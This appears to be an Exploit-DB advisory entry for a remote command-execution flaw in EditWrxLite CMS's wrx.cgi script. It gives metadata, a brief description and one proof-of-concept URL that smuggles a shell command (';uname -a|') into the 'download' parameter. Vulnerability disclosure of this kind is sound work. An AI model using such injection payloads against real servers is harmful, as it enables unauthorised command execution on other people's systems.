EditWrxLite CMS - 'wrx.cgi' Remote Command Execution

EDB-ID:

36772

CVE:

N/A


Platform:

CGI

Published:

2012-02-13

source: http://www.securityfocus.com/bid/51995/info

EditWrxLite CMS is prone to a remote command-execution vulnerability.

Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. 

http://www.example.com/editwrx/wrx.cgi?download=;uname%20-a|